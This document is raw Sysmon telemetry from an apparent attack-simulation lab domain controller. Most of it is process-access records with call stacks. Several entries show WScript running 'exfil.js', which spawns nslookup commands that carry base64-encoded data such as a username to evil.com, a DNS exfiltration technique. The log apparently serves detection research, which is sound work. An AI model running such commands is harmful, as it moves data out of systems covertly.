10341000x8000000000000000217567Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.591{2E1864BB-1905-629A-1547-000000005F02}7988508C:\Windows\system32\conhost.exe{2E1864BB-1905-629A-1447-000000005F02}5592C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217566Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.578{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1905-629A-1547-000000005F02}7988C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217565Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.559{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1905-629A-1447-000000005F02}5592C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217564Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.559{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217563Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.559{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217562Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.559{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217561Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.559{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217560Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.559{2E1864BB-18E0-629A-6742-000000005F02}39762860C:\Windows\System32\WScript.exe{2E1864BB-1905-629A-1447-000000005F02}5592C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217559Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.563{2E1864BB-1905-629A-1447-000000005F02}5592C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltdioj.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000217558Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.559{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlqrpx.tmpMD5=5DEA0472F77A6BF3961D4B745AA161B8,SHA256=60802D61581927EFE9566582D9B1AC54D5861CAF9DA1F25F5EA80365318A8915,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000217557Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.528{2E1864BB-1905-629A-1247-000000005F02}74842444C:\Windows\system32\conhost.exe{2E1864BB-1905-629A-1347-000000005F02}4156C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217556Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.528{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217555Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.528{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217554Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.528{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217553Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.528{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217552Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.528{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-1905-629A-1347-000000005F02}4156C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217551Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.528{2E1864BB-1905-629A-1147-000000005F02}2200644C:\Windows\system32\cmd.exe{2E1864BB-1905-629A-1347-000000005F02}4156C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217550Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.532{2E1864BB-1905-629A-1347-000000005F02}4156C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IERlZmF1bHRBY2NvdW50 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1905-629A-1147-000000005F02}2200C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IERlZmF1bHRBY2NvdW50 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqrpx.tmp 2>&1 10341000x8000000000000000217549Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.512{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-1905-629A-1247-000000005F02}7484C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217548Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.512{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1905-629A-1247-000000005F02}7484C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217547Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.491{2E1864BB-1905-629A-1247-000000005F02}74842444C:\Windows\system32\conhost.exe{2E1864BB-1905-629A-1147-000000005F02}2200C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217546Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.491{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-1905-629A-1247-000000005F02}7484C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217545Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.475{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217544Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.475{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217543Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.475{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217542Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.475{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217541Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.475{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-1905-629A-1147-000000005F02}2200C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217540Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.475{2E1864BB-18E0-629A-6742-000000005F02}39765036C:\Windows\System32\WScript.exe{2E1864BB-1905-629A-1147-000000005F02}2200C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217539Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.485{2E1864BB-1905-629A-1147-000000005F02}2200C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IERlZmF1bHRBY2NvdW50 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqrpx.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000217538Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.475{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlexs.tmpMD5=6549F05B1861103256248974C2999EAD,SHA256=419CF8C4CFB601A92C88A029ACF678E4FE5D927543E581B1FD8233D6D0B2C4E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000217537Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.444{2E1864BB-1905-629A-0F47-000000005F02}6216908C:\Windows\system32\conhost.exe{2E1864BB-1905-629A-1047-000000005F02}7768C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217536Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:57.444{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.D